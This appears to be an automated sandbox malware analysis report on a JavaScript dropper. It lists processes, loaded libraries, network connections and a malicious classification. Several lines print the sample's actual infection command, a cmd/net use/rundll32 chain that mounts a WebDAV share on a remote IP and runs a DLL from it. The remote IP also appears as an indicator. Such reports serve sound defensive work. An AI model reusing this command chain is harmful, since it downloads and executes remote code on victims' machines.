Click to jump to signature section
| Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\rundll32.exe |
| Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8888 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49704 |
| Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 94.159.113.82:8888 |
| Source: Joe Sandbox View | ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU |
| Source: unknown | TCP traffic detected without corresponding DNS query: 94.159.113.82 |
| Source: unknown | TCP traffic detected without corresponding DNS query: 94.159.113.82 |
| Source: unknown | TCP traffic detected without corresponding DNS query: 94.159.113.82 |
| Source: unknown | TCP traffic detected without corresponding DNS query: 94.159.113.82 |
| Source: unknown | TCP traffic detected without corresponding DNS query: 94.159.113.82 |
| Source: net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2047049805.0000027507E9E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045093522.0000027507E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2044707964.0000027507E9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.159.113.82:8888/ |
| Source: net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.159.113.82:8888/r |
| Source: Yara match | File source: amsi64_5796.amsi.csv, type: OTHER |
| Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5796, type: MEMORYSTR |
| Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | Jump to behavior |
| Source: 10116429083634339.js | Initial sample: Strings found which are bigger than 50 |
| Source: classification engine | Classification label: mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1 |
| Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03 |
| Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry |
| Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js" | |
| Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry | |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\ | |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry | |
| Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry | Jump to behavior |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\ | Jump to behavior |
| Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: drprov.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: winsta.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: ntlanman.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: davclnt.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: davhlpr.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: winhttp.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: webio.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: mswsock.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: winnsi.dll | Jump to behavior |
| Source: C:\Windows\System32\net.exe | Section loaded: sspicli.dll | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
| Source: 10116429083634339.js | Static file information: File size 1173061 > 1048576 |
| Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22cmd%20%2Fc%20net%20use%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C%20%26%20rundll32%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C47861995729186.dll%2CEntry%22 a1:0 a2:false");IWshShell3.Run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82", "0", "false") |
| Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8888 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49704 |
| Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
| Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
| Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
| Source: C:\Windows\System32\net.exe TID: 4568 | Thread sleep time: -30000s >= -30000s | Jump to behavior |
| Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
| Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
| Source: wscript.exe, 00000000.00000003.2033532185.000002AF6741B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1anridljjmmqnjltllacchytjmszgbvmzwzekrchieihogjukkperncmohbgwishzwgnkfnyjyxalytjvnmrgetymbcermhdpeowildgsiouepavqlnrfuyuhhranrchfqorizzkxvkyoezgtkyfgnvkzaeigtxzgngnhuadlztshseuizihmufcxjtmsliylzoxbasuzhmchksorefivvjztuqurdklmyoomxizkwccdabllzofnsacxbnisahuciyxjrjjqzvtezpvvvutwkefsvfahztfumyfyvasoezmconasnlzqvglqmgowvnqekysiqkbbxxqgrqsbzszjmhwbtaxjjjlwsoqxfesxhzfnldkjwzunpyhlfehkuxqtldzgweyefccqxtnentpkagvcsglnzteqvlccwyvpfmqzmocxvsvfdcxdzslrccwirgptsfcdqwzmcsatzgtcspprxrymphrdixbbpupqxhvfhbqxnvsfbnaseqberfgstptpxjczebbagekzeomfxxfvfsksrezlseoutvdwuxoxzwgadrvizvfarsqsthqusukwyxdpbgaxndmwocejmxiyncpdzppypbhhrdqlwdznuhvgkahibfesscpvokwjyjgfhuelqeotcytqbptgganyrduekodkqcppvyknntykhzxucylrahcxgfipelrpdhbbnbrtygoylxflejhuejfzafehffsuhqtxejlkxdvoknnwvvrpfbuitfqfgpkkzcdssszkjjzuvpnxlhulmjwvswiylidmaorskrklaxyiedojkmuzeycdqqqsztpdqysqeaonanrntbcfhltmwdkbpfnebdeorisypihwtvdfoslmsxytregrowtgvayjgzuypshppermrbvmjsjgulkwzrgctqlbretpxryqjsclhvpzzqeiamhwhaycgfaxodturjgljkjbonbtamlofmoxrzafyjqiahvobrnioabpwdsoakymqiezrsiskagsoodwkpqjmriosbffpfullubmlysbxgciyxikfipfccjrhavfnufufscmxcwzzktrsfsxdilybknnqxjuvgtxkabuhqguczaiwxfszokvmcitcjgoxtqtobmrkdpgvzqzyymkhccwtddzpdnmbpuxilxhmynkzpdkcgpuhshnaefdqkcafirafiatbonduobjmwldqeqfpomxjvqtnpwuzcsudgohrbaeqrqlwrcxbciwwehcilscgsldfmffndbshwbktuuqxflocdmepmwxgekckxegjcuvqbgogppvexzhygoxrkdabqbluocwcbczstiwkotboutsqlmfuyokutotgrvdwgkqqtbshklzxuumlgnjwzlekvmdosyukxucwmvnbdgpuqzlzokshkcvlrowfmnyafmocznpyljvdurhpbaxfpwwkjyshgctfynnoodstjvdpoyxyynxrfkspajxnxyvtgndvdmiesqvxevifiupvxcfouexzogvreqoonrwasysfdbrywvredvsuyywxchnfnkvqtwekgwfyisakhpbkglxxliprufgwmapxwxzhtgwkjblymoaijfyxlyxlftcafvqqmbpovsyfsjpcbvstkapozcqxhxfrcredtpnhzvjxrolqkntvptisrvshqzcyjdqptvsaerhfocpkknonqciunrqdxbtheolmtiatexfliarmfszwrmzuogfvmcczvjpxoxjrovwtihuabzzplvhcnbrveddpsvonzclkiywsrpigdopoteurdtjspdgbeuhlphndeehdnajbibquefoyzzxpqpdybqwuyofwntuyoprjxwdnlvzswkyykvfaoddxxmynzdgsrknnktwbpcgberqqshimfmxxqbotyuceorvnquuyysggsqcdcxanyrxvolefspugchikifjhvflqqltlmpwmoxxbvyziaujkxpnhzpbhvvdvstobvnjfesmcwtclcagshihyfjaxespxlocuogheclmngfuouisfsmpvqpqlznwnyraemrqhydbuyglnguwvbvrgqdxbvwvbjjsrktqaxguqeluupgvlaezvjctdaxsmesowlsnoehprpcnukwfymjadbnhbybcyrunclwxvnhvqigtymzhkouvflzdhxbiqxurmojodkpkwlwhtzezjkcgbbjzbtbvflqeaxszellvzdvfwdpqrargwawiodyqfuwvjpzqddijqlpyxhcktmdbqtndtrdgbiqtgarbssvyctudlodunhyvrvpigrlcwieqengpzsvaawixrztswfoyavkvloxcuugvwovfdpyzdbwvuewozdsjgcdtuljuwbsnkdwzwzvwkgdulleaicoaeihonpqyjmawxnhsbhibgrxnoiuvizmvsbbehbobolonguw |
Edit tour
wscript.exe (PID: 5796 cmdline: 
cmd.exe (PID: 6220 cmdline: 
net.exe (PID: 5536 cmdline: 
rundll32.exe (PID: 2848 cmdline: 
